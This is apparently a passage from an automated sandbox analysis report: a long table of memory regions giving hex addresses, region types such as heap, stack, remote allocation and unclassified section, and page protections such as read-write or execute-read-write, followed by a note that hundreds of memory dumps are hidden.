trusted library allocation
page read and write
477E000
heap
page read and write
476B000
heap
page read and write
7FF849180000
trusted library allocation
page read and write
22A08000
heap
page read and write
2AB0000
heap
page read and write
2A30000
heap
page read and write
2A34000
heap
page read and write
2E40000
heap
page read and write
2FD9000
heap
page read and write
8500000
trusted library allocation
page read and write
8B90000
trusted library allocation
page execute and read and write
7663000
heap
page read and write
2B10000
heap
page read and write
2F0E000
stack
page read and write
6B8D000
heap
page read and write
31ED000
trusted library allocation
page execute and read and write
3208000
heap
page read and write
4756000
heap
page read and write
4911000
heap
page read and write
8B40000
direct allocation
page read and write
2263F000
stack
page read and write
7FF849060000
trusted library allocation
page read and write
8B30000
direct allocation
page read and write
1DCB06E7000
trusted library allocation
page read and write
2965000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
6B8D000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
3222000
trusted library allocation
page read and write
1CDAB8F000
stack
page read and write
1DCC7DAD000
heap
page read and write
325A000
heap
page read and write
1CD9C7C000
stack
page read and write
79A0000
trusted library allocation
page read and write
81C0000
heap
page read and write
8A70000
trusted library allocation
page read and write
22A91000
heap
page read and write
2AA4000
heap
page read and write
21A80000
direct allocation
page read and write
45D000
system
page execute and read and write
4785000
heap
page read and write
6B8D000
heap
page read and write
3225000
trusted library allocation
page execute and read and write
2BBF000
unkown
page read and write
4B2E000
stack
page read and write
479D000
heap
page read and write
479D000
heap
page read and write
2AA4000
heap
page read and write
4D5F000
remote allocation
page execute and read and write
22C98000
heap
page read and write
4756000
heap
page read and write
1DCAFB7D000
trusted library allocation
page read and write
4756000
heap
page read and write
7FF848FF5000
trusted library allocation
page read and write
477C000
heap
page read and write
1DCC7DE5000
heap
page read and write
764E000
heap
page read and write
44D8000
heap
page read and write
2DD9000
stack
page read and write
2B00000
heap
page read and write
4760000
heap
page read and write
2F75000
heap
page read and write
7810000
heap
page execute and read and write
7FF849080000
trusted library allocation
page read and write
2A7E000
unkown
page read and write
4ECF000
stack
page read and write
22D60000
heap
page read and write
789E000
stack
page read and write
7FF848E14000
trusted library allocation
page read and write
1DCC7CDC000
heap
page read and write
4799000
heap
page read and write
75F0000
heap
page read and write
2A34000
heap
page read and write
1DCC7CC0000
heap
page read and write
23206000
unclassified section
page execute and read and write
21EF0000
heap
page read and write
4749000
heap
page read and write
2C3A000
heap
page read and write
1DCB1891000
trusted library allocation
page read and write
476A000
heap
page read and write
2E2D000
heap
page read and write
494F000
unkown
page read and write
81B0000
heap
page read and write
725A000
stack
page read and write
575F000
remote allocation
page execute and read and write
4750000
heap
page read and write
2AA4000
heap
page read and write
2D7E000
heap
page read and write
2BC0000
heap
page read and write
1DCC7D42000
heap
page read and write
11D000
stack
page read and write
8400000
trusted library allocation
page read and write
52BC000
heap
page read and write
2AA5000
heap
page read and write
21AD0000
direct allocation
page read and write
1DCC7D83000
heap
page read and write
A88F000
direct allocation
page execute and read and write
228F6000
direct allocation
page execute and read and write
78DE000
stack
page read and write
4762000
heap
page read and write
79B0000
trusted library allocation
page read and write
7930000
trusted library allocation
page execute and read and write
4760000
heap
page read and write
2A34000
heap
page read and write
4760000
heap
page read and write
1DCB0709000
trusted library allocation
page read and write
4754000
heap
page read and write
7940000
trusted library allocation
page read and write
1CDAC8B000
stack
page read and write
22D31000
heap
page read and write
4762000
heap
page read and write
1F0000
heap
page read and write
31D0000
trusted library allocation
page read and write
761A000
heap
page read and write
4741000
heap
page read and write
4F40000
trusted library allocation
page read and write
474C000
heap
page read and write
47C2000
heap
page read and write
473000
system
page execute and read and write
6AA0000
heap
page read and write
476E000
heap
page read and write
518D000
heap
page read and write
5071000
heap
page read and write
6B41000
heap
page read and write
84F0000
trusted library allocation
page read and write
1DCB18B0000
trusted library allocation
page read and write
4762000
heap
page read and write
7FF848E12000
trusted library allocation
page read and write
219E0000
direct allocation
page read and write
2AFC000
stack
page read and write
4762000
heap
page read and write
4D40000
trusted library allocation
page read and write
7950000
trusted library allocation
page read and write
4C41000
heap
page read and write
22A14000
heap
page read and write
4753000
heap
page read and write
2E2C000
heap
page read and write
2AA5000
heap
page read and write
6AF0000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
1DCB101A000
trusted library allocation
page read and write
519A000
heap
page read and write
4761000
heap
page read and write
71C0000
direct allocation
page read and write
7FF849070000
trusted library allocation
page read and write
846E000
stack
page read and write
8B50000
direct allocation
page read and write
2E6E000
unkown
page read and write
68D0000
heap
page read and write
4DB3000
heap
page read and write
2C5D000
heap
page read and write
7190000
direct allocation
page read and write
2AA4000
heap
page read and write
2A34000
heap
page read and write
2ABC000
heap
page read and write
1EE000
unkown
page read and write
5523000
trusted library allocation
page read and write
4756000
heap
page read and write
4753000
heap
page read and write
45C000
system
page execute and read and write
23189000
unclassified section
page execute and read and write
474C000
heap
page read and write
2E80000
heap
page read and write
4768000
heap
page read and write
2D7A000
heap
page read and write
1DCB18C6000
trusted library allocation
page read and write
6B37000
heap
page read and write
2211E000
stack
page read and write
5084000
heap
page read and write
84B0000
trusted library allocation
page execute and read and write
896E000
stack
page read and write
22B83000
heap
page read and write
83E0000
trusted library allocation
page execute and read and write
2AA4000
heap
page read and write
2D77000
heap
page read and write
1DCBFAFF000
trusted library allocation
page read and write
4760000
heap
page read and write
7A00000
trusted library allocation
page read and write
76C3000
heap
page read and write
7FF848FF2000
trusted library allocation
page read and write
89B0000
trusted library allocation
page execute and read and write
1DCC7AF0000
heap
page execute and read and write
21E30000
heap
page read and write
2AB3000
heap
page read and write
8520000
trusted library allocation
page read and write
2BB0000
heap
page readonly
5562000
trusted library allocation
page read and write
2D7B000
heap
page read and write
8875000
trusted library allocation
page read and write
3240000
trusted library allocation
page read and write
1DCBFB11000
trusted library allocation
page read and write
4B6A000
heap
page read and write
4B66000
heap
page read and write
2A34000
heap
page read and write
22A91000
heap
page read and write
21A50000
direct allocation
page read and write
7FC00000
trusted library allocation
page execute and read and write
223B0000
remote allocation
page read and write
6B89000
heap
page read and write
4760000
heap
page read and write
7085000
heap
page execute and read and write
1CDAD0B000
stack
page read and write
8ADE000
stack
page read and write
219C0000
direct allocation
page read and write
76B9000
heap
page read and write
85D1000
heap
page read and write
4C41000
heap
page read and write
8B1C000
stack
page read and write
4F45000
heap
page read and write
2A34000
heap
page read and write
4F40000
trusted library allocation
page read and write
4911000
heap
page read and write
84C0000
heap
page read and write
1DCB188C000
trusted library allocation
page read and write
68E0000
direct allocation
page read and write
4B0F000
stack
page read and write
223EE000
stack
page read and write
6B33000
heap
page read and write
6B76000
heap
page read and write
1CDA13B000
stack
page read and write
22A08000
heap
page read and write
83D7000
stack
page read and write
7990000
trusted library allocation
page read and write
400000
system
page execute and read and write
7FF849120000
trusted library allocation
page read and write
6B88000
heap
page read and write
435F000
remote allocation
page execute and read and write
6B91000
heap
page read and write
4751000
heap
page read and write
2AA4000
heap
page read and write
4751000
heap
page read and write
1DCADC00000
heap
page readonly
7FF848F30000
trusted library allocation
page execute and read and write
8613000
heap
page read and write
4785000
heap
page read and write
21A40000
direct allocation
page read and write
7FF849110000
trusted library allocation
page read and write
83F0000
trusted library allocation
page read and write
1CD9B7E000
stack
page read and write
21A20000
direct allocation
page read and write
2A2F000
stack
page read and write
1DCAF480000
trusted library allocation
page read and write
21AA0000
direct allocation
page read and write
55A1000
trusted library allocation
page read and write
8A3C000
stack
page read and write
6B7A000
heap
page read and write
1DCADAF0000
heap
page read and write
2AA5000
heap
page read and write
4DCE000
stack
page read and write
4AEC000
stack
page read and write
21AC0000
direct allocation
page read and write
4751000
heap
page read and write
1CD9D3E000
stack
page read and write
22BFC000
heap
page read and write
4754000
heap
page read and write
2A34000
heap
page read and write
55FF000
trusted library allocation
page read and write
84AE000
stack
page read and write
1DCAD9E0000
heap
page read and write
474C000
heap
page read and write
1DCAF950000
heap
page read and write
22D30000
heap
page read and write
1DCADB13000
heap
page read and write
289A000
stack
page read and write
4BF1000
trusted library allocation
page read and write
85F1000
heap
page read and write
4751000
heap
page read and write
2D5E000
stack
page read and write
1CD99FD000
stack
page read and write
7FF849150000
trusted library allocation
page read and write
60E000
stack
page read and write
4750000
heap
page read and write
93A0000
direct allocation
page execute and read and write
4D48000
trusted library allocation
page read and write
1DCADBF0000
trusted library allocation
page read and write
2A34000
heap
page read and write
1CD9A7E000
stack
page read and write
791D000
stack
page read and write
4749000
heap
page read and write
1DCADA6D000
heap
page read and write
228CB000
unclassified section
page execute and read and write
89AE000
stack
page read and write
8A60000
trusted library allocation
page read and write
1DCC7BE3000
heap
page read and write
223B0000
remote allocation
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
5C01000
trusted library allocation
page read and write
1DCAFF8F000
trusted library allocation
page read and write
55C0000
trusted library allocation
page read and write
31E3000
trusted library allocation
page execute and read and write
2D7A000
heap
page read and write
4D40000
heap
page read and write
7170000
direct allocation
page read and write
1CD9BFF000
stack
page read and write
2964000
heap
page read and write
4760000
heap
page read and write
4751000
heap
page read and write
1DCAFF73000
trusted library allocation
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
1DCADA60000
heap
page read and write
22210000
direct allocation
page read and write
7FF849170000
trusted library allocation
page read and write
316E000
stack
page read and write
4741000
heap
page read and write
477D000
heap
page read and write
77F0000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
1DCAFAF1000
trusted library allocation
page read and write
4753000
heap
page read and write
2A1C000
stack
page read and write
2AA4000
heap
page read and write
2A34000
heap
page read and write
2242F000
stack
page read and write
29D0000
heap
page readonly
47C2000
heap
page read and write
2A34000
heap
page read and write
2ECE000
stack
page read and write
2E48000
heap
page read and write
2BF9000
stack
page read and write
4761000
heap
page read and write
1DCADBC0000
trusted library allocation
page read and write
1CDA03E000
stack
page read and write
6B8B000
heap
page read and write
231B0000
unclassified section
page execute and read and write
2AA4000
heap
page read and write
22A09000
heap
page read and write
22D90000
heap
page read and write
1DCAFF8B000
trusted library allocation
page read and write
1DCBFAF1000
trusted library allocation
page read and write
89FD000
stack
page read and write
6B76000
heap
page read and write
4910000
heap
page read and write
4F40000
trusted library allocation
page read and write
2E20000
heap
page read and write
4762000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
21A10000
direct allocation
page read and write
706E000
stack
page read and write
758E000
stack
page read and write
2B1A000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
2E2C000
heap
page read and write
1DCC7DD6000
heap
page read and write
6B91000
heap
page read and write
4753000
heap
page read and write
1C0000
heap
page read and write
52AD000
heap
page read and write
6FAE000
stack
page read and write
2F20000
heap
page read and write
721D000
stack
page read and write
4741000
heap
page read and write
615F000
remote allocation
page execute and read and write
4755000
heap
page read and write
459000
system
page execute and read and write
2AA4000
heap
page read and write
2FB0000
heap
page read and write
6B41000
heap
page read and write
6900000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
4D49000
heap
page read and write
6B8B000
heap
page read and write
228E0000
direct allocation
page read and write
4760000
heap
page read and write
2C5F000
heap
page read and write
4765000
heap
page read and write
2AA4000
heap
page read and write
6B3E000
heap
page read and write
7FF848EC6000
trusted library allocation
page read and write
285C000
stack
page read and write
2ABE000
heap
page read and write
2F10000
heap
page read and write
1DCB0161000
trusted library allocation
page read and write
1DCAF450000
trusted library allocation
page read and write
2267D000
stack
page read and write
21A00000
direct allocation
page read and write
1DCADC45000
heap
page read and write
6AAA000
heap
page read and write
1DCAF600000
heap
page read and write
1DCC7BC0000
heap
page read and write
3190000
heap
page read and write
7701000
heap
page read and write
4741000
heap
page read and write
715B000
stack
page read and write
4F40000
trusted library allocation
page read and write
68F0000
direct allocation
page read and write
1A0000
heap
page read and write
8590000
heap
page read and write
1DCADB15000
heap
page read and write
294B000
heap
page read and write
4740000
heap
page read and write
475C000
heap
page read and write
22230000
direct allocation
page read and write
6B8A000
heap
page read and write
2AB0000
heap
page read and write
2F60000
heap
page read and write
4760000
heap
page read and write
228B0000
unclassified section
page execute and read and write
76D3000
heap
page read and write
2BFE000
stack
page read and write
476B000
heap
page read and write
47F000
stack
page read and write
2A34000
heap
page read and write
3200000
heap
page read and write
225FC000
stack
page read and write
2AA4000
heap
page read and write
321A000
trusted library allocation
page execute and read and write
4785000
heap
page read and write
6B7A000
heap
page read and write
4785000
heap
page read and write
4760000
heap
page read and write
1DCADB0E000
heap
page read and write
7FF848FF7000
trusted library allocation
page read and write
4741000
heap
page read and write
7617000
heap
page read and write
231A3000
unclassified section
page execute and read and write
31E0000
trusted library allocation
page read and write
67A0000
heap
page read and write
2283D000
stack
page read and write
477F000
heap
page read and write
79E0000
trusted library allocation
page read and write
2AA4000
heap
page read and write
4783000
heap
page read and write
1DCC7D87000
heap
page read and write
4720000
heap
page read and write
22A24000
heap
page read and write
4DB3000
heap
page read and write
4BB0000
heap
page execute and read and write
22A90000
heap
page read and write
7DF4704E0000
trusted library allocation
page execute and read and write
4A0000
heap
page read and write
6F6F000
stack
page read and write
1DCBFDD8000
trusted library allocation
page read and write
5BF1000
trusted library allocation
page read and write
7FF848ED0000
trusted library allocation
page execute and read and write
2A34000
heap
page read and write
1CDAC0D000
stack
page read and write
4749000
heap
page read and write
6B76000
heap
page read and write
1DCB18B4000
trusted library allocation
page read and write
6906000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
2AA5000
heap
page read and write
8A50000
trusted library allocation
page read and write
219F0000
direct allocation
page read and write
7FF848E2B000
trusted library allocation
page read and write
2D70000
heap
page read and write
4760000
heap
page read and write
1DCBFDE6000
trusted library allocation
page read and write
21A70000
direct allocation
page read and write
2320C000
unclassified section
page execute and read and write
4750000
heap
page read and write
7FF848FC1000
trusted library allocation
page read and write
1D0000
heap
page read and write
71B0000
direct allocation
page read and write
79D0000
trusted library allocation
page read and write
2BBC000
stack
page read and write
4740000
heap
page read and write
7FF848FCA000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page read and write
4741000
heap
page read and write
479D000
heap
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
2BA0000
heap
page read and write
2FDF000
heap
page read and write
219D0000
direct allocation
page read and write
1CD9DB7000
stack
page read and write
475C000
heap
page read and write
7FF849190000
trusted library allocation
page read and write
1DCC7D3E000
heap
page read and write
1DCC7D46000
heap
page read and write
4741000
heap
page read and write
4756000
heap
page read and write
2AA4000
heap
page read and write
2F2B000
heap
page read and write
475C000
heap
page read and write
2BFD000
stack
page read and write
1DCAF9DC000
heap
page read and write
474C000
heap
page read and write
2287E000
stack
page read and write
7080000
heap
page execute and read and write
4740000
heap
page read and write
5C19000
trusted library allocation
page read and write
477C000
heap
page read and write
22A41000
heap
page read and write
2A90000
heap
page readonly
2257B000
stack
page read and write
8A40000
trusted library allocation
page read and write
4760000
heap
page read and write
6B8D000
heap
page read and write
479D000
heap
page read and write
1CD9FBE000
stack
page read and write
4758000
heap
page read and write
1CD9E37000
stack
page read and write
507C000
heap
page read and write
4B60000
trusted library allocation
page read and write
4768000
heap
page read and write
8880000
trusted library allocation
page read and write
2215F000
stack
page read and write
750E000
stack
page read and write
5E0000
heap
page read and write
79C0000
trusted library allocation
page read and write
5BFB000
trusted library allocation
page read and write
4778000
heap
page read and write
4750000
heap
page read and write
1DCADA20000
heap
page read and write
8B20000
direct allocation
page read and write
22991000
heap
page read and write
2AA4000
heap
page read and write
7A4C000
stack
page read and write
4760000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
4751000
heap
page read and write
4749000
heap
page read and write
4766000
heap
page read and write
7970000
trusted library allocation
page read and write
4756000
heap
page read and write
4270000
remote allocation
page execute and read and write
1DCADB57000
heap
page read and write
2FE6000
heap
page read and write
4762000
heap
page read and write
4B30000
trusted library allocation
page execute and read and write
1DCAF4E0000
heap
page read and write
4773000
heap
page read and write
4755000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
2AA5000
heap
page read and write
7360000
heap
page read and write
2ABC000
heap
page read and write
2318D000
unclassified section
page execute and read and write
2AA5000
heap
page read and write
2940000
heap
page read and write
1DCADB0A000
heap
page read and write
4C43000
heap
page read and write
1CD997E000
stack
page read and write
1CD9876000
stack
page read and write
731D000
stack
page read and write
47C2000
heap
page read and write
23130000
unclassified section
page execute and read and write
312E000
stack
page read and write
6B26000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
2A80000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
2EB0000
heap
page read and write
4B40000
trusted library allocation
page read and write
1DCAFA4E000
heap
page read and write
4741000
heap
page read and write
5084000
heap
page read and write
729D000
stack
page read and write
4798000
heap
page read and write
4781000
heap
page read and write
4755000
heap
page read and write
2AA4000
heap
page read and write
948F000
direct allocation
page execute and read and write
6890000
heap
page read and write
4D41000
heap
page read and write
1DCB06D2000
trusted library allocation
page read and write
2A33000
stack
page read and write
2A34000
heap
page read and write
1DCAFD1C000
trusted library allocation
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
6B91000
heap
page read and write
2D7B000
heap
page read and write
3220000
trusted library allocation
page read and write
4745000
heap
page read and write
762A000
heap
page read and write
7960000
trusted library allocation
page read and write
8510000
trusted library allocation
page read and write
600000
heap
page read and write
456000
system
page execute and read and write
4A3E000
stack
page read and write
31B0000
trusted library section
page read and write
7FF849030000
trusted library allocation
page read and write
1DCADC40000
heap
page read and write
863D000
heap
page read and write
13D000
stack
page read and write
4FD000
stack
page read and write
21EEF000
stack
page read and write
1DCB06FD000
trusted library allocation
page read and write
2FBA000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
84D0000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
4C52000
trusted library allocation
page read and write
785E000
stack
page read and write
2D1E000
unkown
page read and write
4B9E000
stack
page read and write
228E1000
direct allocation
page execute and read and write
85B5000
heap
page read and write
8530000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
21A30000
direct allocation
page read and write
225BE000
stack
page read and write
6B3A000
heap
page read and write
1DCAF4E5000
heap
page read and write
1CDAB0E000
stack
page read and write
735C000
stack
page read and write
1CD9AFC000
stack
page read and write
1CD9EB9000
stack
page read and write
6880000
heap
page readonly
890B000
stack
page read and write
8B80000
direct allocation
page read and write
1CDA0BE000
stack
page read and write
22A15000
heap
page read and write
2AA0000
heap
page read and write
222BF000
stack
page read and write
4C40000
heap
page read and write
1DCAFF7E000
trusted library allocation
page read and write
6B35000
heap
page read and write
31F0000
trusted library allocation
page read and write
2A34000
heap
page read and write
47C2000
heap
page read and write
1DCC7BB7000
heap
page execute and read and write
223B0000
remote allocation
page read and write
523C000
trusted library allocation
page read and write
4750000
heap
page read and write
There are 761 hidden memdumps, click here to show them.